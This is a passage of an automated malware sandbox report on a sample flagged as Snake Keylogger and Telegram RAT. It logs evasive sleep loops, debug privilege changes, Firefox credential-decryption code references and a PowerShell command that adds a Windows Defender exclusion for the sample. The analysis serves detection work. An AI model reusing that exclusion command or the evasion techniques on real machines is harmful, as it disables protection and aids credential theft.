Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595000 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594865 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594750 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594640 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594531 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6282 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3283 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Window / User API: threadDelayed 1672 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Window / User API: threadDelayed 8189 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Window / User API: foregroundWindowGot 1735 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 3500 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4512 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -28592453314249787s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599780s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599560s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597577s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -597031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596590s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -596015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -595000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -594865s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -594750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -594640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924 Thread sleep time: -594531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599780 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599560 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597577 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596921 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596590 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595218 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 595000 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594865 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594750 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594640 Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Thread delayed: delay time: 594531 Jump to behavior
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3726403928.0000000006A40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3718826716.00000000013E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9548 LdrInitializeThunk,LdrInitializeThunk, 6_2_06DF9548
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe" Jump to behavior
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager,q
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003686000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003686000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerPr
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerx
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
